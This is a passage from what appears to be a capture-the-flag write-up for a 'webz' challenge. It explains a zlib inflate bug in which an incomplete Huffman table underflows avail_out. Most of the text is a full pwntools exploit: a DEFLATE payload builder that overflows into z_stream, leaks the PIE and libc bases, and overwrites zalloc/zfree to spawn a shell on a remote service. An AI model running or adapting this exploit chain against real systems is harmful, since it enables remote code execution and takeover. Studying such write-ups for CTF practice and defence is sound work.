stream.bytebits()
stored_block_length = len(overwrriten_infstream)
stream.write_bits(stored_block_length + ( (stored_block_length ^ 0xffff) << 16 ), 32) 
for i in range(0, stored_block_length):
    stream.write_bits(overwrriten_infstream[i], 8)
# STORED BLOCK =============================================================================

"""
0x000064f4b0253370│+0x0000: 0x000064f4b02507de  →  0x0000000000000000
0x000064f4b0253378│+0x0008: 0x0000000000000000
0x000064f4b0253380│+0x0010: 0x0000000000000472
0x000064f4b0253388│+0x0018: 0x000064f4b0253370  →  0x000064f4b02507de  →  0x0000000000000000
0x000064f4b0253390│+0x0020: 0x00000000ffffe304  →  0x0000000000000000
0x000064f4b0253398│+0x0028: 0x0000000000002008
0x000064f4b02533a0│+0x0030: 0x000064f4b02533e0  →  0x0000000000000000
0x000064f4b02533a8│+0x0038: 0x0000000000000000
0x000064f4b02533b0│+0x0040: 0x000064f4af885820  →  <webz_alloc+0000> push rbp
0x000064f4b02533b8│+0x0048: 0x000064f4af8a3390  →  <zcfree+0000> push rbp
0x000064f4b02533c0│+0x0050: 0x0000000000000000
0x000064f4b02533c8│+0x0058: 0x0000000000000040 ("@"?)
"""

payload = stream.get_bytes()
print(f"Generated DEFLATE payload ({len(payload)} bytes):")

p = process("./webz")
#p = process("./src/webz_asan")

def send_webz_payload(pay):
    #MAX_AROUND_WIDTH_HEIGHT = p8(0x0) + p8(52) + p8(0x0) + p8(52) # MAX = 52, 52
    NORMAL_AROUND_WIDTH_HEIGHT = p8(0x0) + p8(52) + p8(0x0) + p8(5)
    p.send(p32(len(pay)+12))
    p.send(b"WEBZ"+NORMAL_AROUND_WIDTH_HEIGHT+b"\x00\x00\x00\x00"+pay)

raw_input()
send_webz_payload(payload)

p.interactive()

The PoC uses six blocks. Let’s walk through them.

# STORED BLOCK ===============================================================================
stream.write_bits(0, 1) # BFINAL
stream.write_bits(0, 2) # BTYPE (0 for stored)
stream.bytebits()
stored_block_length = 0x200
stream.write_bits(stored_block_length + ( (stored_block_length ^ 0xffff) << 16 ), 32) 
for i in range(0, stored_block_length):
    stream.write_bits(ord('X'), 8)
# STORED BLOCK ===============================================================================

Block 1: writes dummy bytes to the output buffer so that later copies with large distances won’t misbehave.

# DYNAMIC BLOCK ==============================================================================
symbol_stream = [ ('EOB', 256) ]

ll_lengths = [0] * 286
ll_lengths[256] = 3 # EOB

dist_lengths = [0] * 30
for i in range(17,30):
    dist_lengths[i] = 15

create_dynamic_deflate_payload(stream, 0, symbol_stream, ll_lengths, dist_lengths)
# DYNAMIC BLOCK ==============================================================================

Block 2: prepares the ground for the bug by filling the table area with Distance symbols. Those entries will persist in uninitialized slots later.

# DYNAMIC BLOCK ==============================================================================
symbol_stream = []

symbol_stream.append(("INVALID", (8,10)))
symbol_stream.append(("INVALID", (0b1111111,7))) # extra bits
symbol_stream.append(("INVALID", (int('000'[::-1],2),3)))
symbol_stream.append(("INVALID", (0b1111111,7))) # extra bits
symbol_stream.append(('EOB', 256))
ll_lengths = [0] * 286
ll_lengths[256] = 10 # EOB
ll_lengths[257] = 10 # Length 3
ll_lengths[258] = 12 # Length 4

dist_lengths = [0] * 30
dist_lengths[17] = 3 # Distance ???

create_dynamic_deflate_payload(stream, 0, symbol_stream, ll_lengths, dist_lengths)
# DYNAMIC BLOCK ==============================================================================

Block 3: creates an incomplete Huffman table and references the uninitialized entry to perform LZ77 decoding. This actually triggers the bug and causes integer overflow in avail_out. From this point on, boundary checks for the decompression buffer malfunction, enabling buffer overflow.

# STORED BLOCK ===============================================================================
stream.write_bits(0, 5) # dummy
stream.write_bits(0, 1) # BFINAL
stream.write_bits(0, 2) # BTYPE (0 for stored)
stream.bytebits()
stored_block_length = 0x10
stream.write_bits(stored_block_length + ( (stored_block_length ^ 0xffff) << 16 ), 32) 
for i in range(0, stored_block_length):
    stream.write_bits(ord('C'), 8)
# STORED BLOCK ===============================================================================

# DYNAMIC BLOCK ==============================================================================
symbol_stream = []
symbol_stream.append(('LIT', 65))
for i in range(0,0x2ce):
    symbol_stream.append(('LD', (10, 1)))
for i in range(0,7):
    symbol_stream.append(('LIT', 65))
symbol_stream.append(('EOB', 256))

ll_lengths = [0] * 286
ll_lengths[65] = 3  # 'A'
ll_lengths[256] = 3 # EOB
ll_lengths[264] = 3 # Length 10

dist_lengths = [0] * 30
dist_lengths[0] = 3 # Distance 1


create_dynamic_deflate_payload(stream, 0, symbol_stream, ll_lengths, dist_lengths)
# DYNAMIC BLOCK ==============================================================================

As noted, to overwrite z_stream infstream, we must first fill the 8192‑byte output buffer. We use LZ77 and a stored block to push ~8120 bytes of padding.

Due to padding/alignment within WebzState, we need 8120 bytes (not 8192) to reach just before z_stream infstream. Also, because the decompression buffer is larger than the compressed input limit, we use LZ77 to generate many output bytes from little input.

# STORED BLOCK ===============================================================================
overwrriten_infstream = b'X'*0x60

stream.write_bits(1, 1) # BFINAL
stream.write_bits(0, 2) # BTYPE (0 for stored)
stream.bytebits()
stored_block_length = len(overwrriten_infstream)
stream.write_bits(stored_block_length + ( (stored_block_length ^ 0xffff) << 16 ), 32) 
for i in range(0, stored_block_length):
    stream.write_bits(overwrriten_infstream[i], 8)
# STORED BLOCK =============================================================================

The final block performs the actual overflow to overwrite z_stream infstream, letting us set its members arbitrarily.

Running the PoC confirms z_stream infstream is overwritten.

5. Exploit

The exploit is straightforward.

printf("Read receipt: %s\n", webz_state.infstream.msg);

First, by partially overwriting the msg pointer in infstream or setting it arbitrarily, we get arbitrary read.

local int updatewindow(z_streamp strm, const Bytef *end, unsigned copy) {
    struct inflate_state FAR *state;
    unsigned dist;

    state = (struct inflate_state FAR *)strm->state;

    /* if it hasn't been done already, allocate space for the window */
    if (state->window == Z_NULL) {
        state->window = (unsigned char FAR *)
                        ZALLOC(strm, 1U << state->wbits,
                               sizeof(unsigned char));
        if (state->window == Z_NULL) return 1;
    }
...

int ZEXPORT inflateEnd(z_streamp strm) {
    struct inflate_state FAR *state;
    if (inflateStateCheck(strm))
        return Z_STREAM_ERROR;
    state = (struct inflate_state FAR *)strm->state;
    if (state->window != Z_NULL) ZFREE(strm, state->window);
    ZFREE(strm, strm->state);
    strm->state = Z_NULL;
    Tracev((stderr, "inflate: end\n"));
    return Z_OK;
}

Additionally, since updatewindow and inflateEnd call zalloc/zfree, control‑flow hijacking is easy.

import struct
from pwn import *

class BitStream:
    """LSB-first bit stream writer."""
    def __init__(self):
        self.bits = 0
        self.bit_count = 0
        self.data = bytearray()

    def write_bits(self, value, num_bits):
        for i in range(num_bits):
            bit = (value >> i) & 1
            if bit:
                self.bits |= (1 << self.bit_count)
            self.bit_count += 1
            if self.bit_count == 8:
                self.data.append(self.bits)
                self.bits = 0
                self.bit_count = 0
    
    def bytebits(self):
        self.write_bits(0, 8 - (self.bit_count % 8))

    def get_bytes(self):
        if self.bit_count > 0:
            self.data.append(self.bits)
        return self.data

def generate_huffman_codes_from_lengths(lengths):
    max_len = 0
    for length in lengths:
        if length > max_len:
            max_len = length
    
    if max_len == 0:
        return {}

    bl_count = [0] * (max_len + 1)
    for length in lengths:
        if length > 0:
            bl_count[length] += 1
    
    code = 0
    next_code = [0] * (max_len + 1)
    for bits_len in range(1, max_len + 1):
        code = (code + bl_count[bits_len - 1]) << 1
        next_code[bits_len] = code

    huffman_codes = {}
    for i, length in enumerate(lengths):
        if length != 0:
            rev_code = int(f'{next_code[length]:0{length}b}'[::-1], 2)
            huffman_codes[i] = (rev_code, length)
            next_code[length] += 1
    
    return huffman_codes

lbase = [3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19, 23, 27, 31, 35, 43, 51, 59, 67, 83, 99, 115, 131, 163, 195, 227, 258]
lext = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0]
dbase = [1, 2, 3, 4, 5, 7, 9, 13, 17, 25, 33, 49, 65, 97, 129, 193, 257, 385, 513, 769, 1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577]
dext = [0, 0, 0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12, 12, 13, 13]
order = [16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15]

def find_len_sym(length):
    for i in range(len(lbase)):
        if lbase[i] > length:
            i -= 1
            break
    base_len = lbase[i]
    extra_bits = lext[i]
    extra_val = length - base_len
    return 257 + i, extra_bits, extra_val

def find_dist_sym(distance):
    for i in range(len(dbase)):
        if dbase[i] > distance:
            i -= 1
            break
    base_dist = dbase[i]
    extra_bits = dext[i]
    extra_val = distance - base_dist
    return i, extra_bits, extra_val

def encode_lengths_rle(lengths):
    encoded = []
    i = 0
    while i < len(lengths):
        current_len = lengths[i]
        
        if current_len == 0:
            count = 0
            while i + count < len(lengths) and lengths[i + count] == 0 and count < 138:
                count += 1
            if count >= 11:
                encoded.append((18, count - 11))
                i += count
                continue
            if count >= 3:
                encoded.append((17, count - 3))
                i += count
                continue

        if i > 0 and current_len == lengths[i - 1]:
            count = 0
            while i + count < len(lengths) and lengths[i + count] == current_len and count < 6:
                count += 1
            if count >= 3:
                encoded.append((16, count - 3))
                i += count
                continue

        encoded.append((current_len, None))
        i += 1
    return encoded

def create_dynamic_deflate_payload(stream, is_last, symbol_stream, ll_lengths, dist_lengths):
    
    nlen = max(i for i, length in enumerate(ll_lengths) if length > 0) + 1
    ndist = max(i for i, length in enumerate(dist_lengths) if length > 0) + 1
    
    all_lengths = ll_lengths[:nlen] + dist_lengths[:ndist]
    rle_encoded_lengths = encode_lengths_rle(all_lengths)
    
    rle_symbols = [item[0] for item in rle_encoded_lengths]
    code_symbol_freqs = {sym: rle_symbols.count(sym) for sym in set(rle_symbols)}
    
    code_table_lengths = [0] * 19
    for sym in code_symbol_freqs:
        code_table_lengths[sym] = 7
    
    ncode = max(i for i, length in enumerate(order) if code_table_lengths[length] > 0) + 1

    code_huffman_table = generate_huffman_codes_from_lengths(code_table_lengths)

    stream.write_bits(is_last, 1) # BFINAL
    stream.write_bits(2, 2) # BTYPE (10 for dynamic)

    stream.write_bits(nlen - 257, 5)
    stream.write_bits(ndist - 1, 5)
    stream.write_bits(ncode - 4, 4)

    for i in range(ncode):
        stream.write_bits(code_table_lengths[order[i]], 3)
        
    for sym, extra_val in rle_encoded_lengths:
        code, length = code_huffman_table[sym]
        stream.write_bits(code, length)
        if sym == 16: stream.write_bits(extra_val, 2)
        elif sym == 17: stream.write_bits(extra_val, 3)
        elif sym == 18: stream.write_bits(extra_val, 7)


    ll_huffman_table = generate_huffman_codes_from_lengths(ll_lengths)
    dist_huffman_table = generate_huffman_codes_from_lengths(dist_lengths)
    
    for type, val in symbol_stream:
        if type == 'LIT':
            code, length = ll_huffman_table[val]
            stream.write_bits(code, length)
        elif type == 'EOB':
            code, length = ll_huffman_table[val]
            stream.write_bits(code, length)
        elif type == 'LD':
            l, d = val
            len_sym, len_extra_bits, len_extra_val = find_len_sym(l)
            dist_sym, dist_extra_bits, dist_extra_val = find_dist_sym(d)
            
            code, length = ll_huffman_table[len_sym]
            stream.write_bits(code, length)
            if len_extra_bits > 0:
                stream.write_bits(len_extra_val, len_extra_bits)
            
            code, length = dist_huffman_table[dist_sym]
            stream.write_bits(code, length)
            if dist_extra_bits > 0:
                stream.write_bits(dist_extra_val, dist_extra_bits)
        elif type == 'INVALID':
            code, length = val
            stream.write_bits(code, length)

def create_exploit_stream(stream):
    # STORED BLOCK ===============================================================================
    stream.write_bits(0, 1) # BFINAL
    stream.write_bits(0, 2) # BTYPE (0 for stored)
    stream.bytebits()
    stored_block_length = 0x200
    stream.write_bits(stored_block_length + ( (stored_block_length ^ 0xffff) << 16 ), 32) 
    for i in range(0, stored_block_length):
        stream.write_bits(ord('X'), 8)
    # STORED BLOCK ===============================================================================

    # DYNAMIC BLOCK ==============================================================================
    symbol_stream = [ ('EOB', 256) ]

    ll_lengths = [0] * 286
    ll_lengths[256] = 3 # EOB

    dist_lengths = [0] * 30
    for i in range(17,30):
        dist_lengths[i] = 15

    create_dynamic_deflate_payload(stream, 0, symbol_stream, ll_lengths, dist_lengths)
    # DYNAMIC BLOCK ==============================================================================

    # DYNAMIC BLOCK ==============================================================================
    symbol_stream = []

    symbol_stream.append(("INVALID", (8,10)))
    symbol_stream.append(("INVALID", (0b1111111,7))) # extra bits
    symbol_stream.append(("INVALID", (int('000'[::-1],2),3)))
    symbol_stream.append(("INVALID", (0b1111111,7))) # extra bits
    symbol_stream.append(('EOB', 256))
    ll_lengths = [0] * 286
    ll_lengths[256] = 10 # EOB
    ll_lengths[257] = 10 # Length 3
    ll_lengths[258] = 12 # Length 4

    dist_lengths = [0] * 30
    dist_lengths[17] = 3 # Distance ???

    create_dynamic_deflate_payload(stream, 0, symbol_stream, ll_lengths, dist_lengths)
    # DYNAMIC BLOCK ==============================================================================

    # STORED BLOCK ===============================================================================
    stream.write_bits(0, 5) # dummy
    stream.write_bits(0, 1) # BFINAL
    stream.write_bits(0, 2) # BTYPE (0 for stored)
    stream.bytebits()
    stored_block_length = 0x10
    stream.write_bits(stored_block_length + ( (stored_block_length ^ 0xffff) << 16 ), 32) 
    for i in range(0, stored_block_length):
        stream.write_bits(ord('C'), 8)
    # STORED BLOCK ===============================================================================

    # DYNAMIC BLOCK ==============================================================================
    symbol_stream = []
    symbol_stream.append(('LIT', 65))
    for i in range(0,0x2ce):
        symbol_stream.append(('LD', (10, 1)))
    for i in range(0,7):
        symbol_stream.append(('LIT', 65))
    symbol_stream.append(('EOB', 256))

    ll_lengths = [0] * 286
    ll_lengths[65] = 3  # 'A'
    ll_lengths[256] = 3 # EOB
    ll_lengths[264] = 3 # Length 10

    dist_lengths = [0] * 30
    dist_lengths[0] = 3 # Distance 1


    create_dynamic_deflate_payload(stream, 0, symbol_stream, ll_lengths, dist_lengths)
    # DYNAMIC BLOCK ==============================================================================

def overwrite_infstream(stream, pay):
    # STORED BLOCK ===============================================================================
    overwrriten_infstream = pay

    stream.write_bits(1, 1) # BFINAL
    stream.write_bits(0, 2) # BTYPE (0 for stored)
    stream.bytebits()
    stored_block_length = len(overwrriten_infstream)
    stream.write_bits(stored_block_length + ( (stored_block_length ^ 0xffff) << 16 ), 32) 
    for i in range(0, stored_block_length):
        stream.write_bits(overwrriten_infstream[i], 8)
    # STORED BLOCK =============================================================================

#p = process("./webz")
p = remote("webz.2025.ctfcompetition.com", 1337)

# POW =============================================================================
print(p.recv(1024))
answer = raw_input()
print(answer)
p.sendline(answer)
time.sleep(0.5)
# POW =============================================================================

def send_webz_payload(pay):
    NORMAL_AROUND_WIDTH_HEIGHT = p8(0x0) + p8(52) + p8(0x0) + p8(5)
    p.send(p32(len(pay)+12))
    p.send(b"WEBZ"+NORMAL_AROUND_WIDTH_HEIGHT+b"\x00\x00\x00\x00"+pay)
    time.sleep(0.5)

# Leaking Pie Base By Partial-Overwrite =============================================================================
pay = b"x"*0x30 + p8(0x0)
stream = BitStream()
create_exploit_stream(stream)
overwrite_infstream(stream, pay)
send_webz_payload(stream.get_bytes())

p.recvuntil(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
pie_base = u64(p.recvn(6)+b'\x00\x00') - 0x1251b
print(f'pie_base = {hex(pie_base)}')
# Leaking Pie Base By Partial-Overwrite =============================================================================

# Leaking Libc Base By AAR =============================================================================
pay = b"x"*0x30 + p64(pie_base+0x12000) # free@got
stream = BitStream()
create_exploit_stream(stream)
overwrite_infstream(stream, pay)
send_webz_payload(stream.get_bytes())

p.recvuntil(b'receipt: ')
libc_base = u64(p.recvn(6)+b'\x00\x00') - 0xadd30
print(f'libc_base = {hex(libc_base)}')
# Leaking Libc Base By AAR =============================================================================

# Control Flow Hijacking By Overwriting zalloc =============================================================================
system_without_align_issue = libc_base+0x582d2
binsh = libc_base+0x1cb42f
jmp_to_zfree = pie_base+0x44da
dummy_memory = pie_base+0x13000
pay = b"\x00"*0x30 + p64(dummy_memory) + p64(dummy_memory) + p64(jmp_to_zfree) + p64(system_without_align_issue) + p64(binsh) * 30
stream = BitStream()
create_exploit_stream(stream)
overwrite_infstream(stream, pay)
send_webz_payload(stream.get_bytes())
# Control Flow Hijacking By Overwriting zalloc =============================================================================

p.interactive()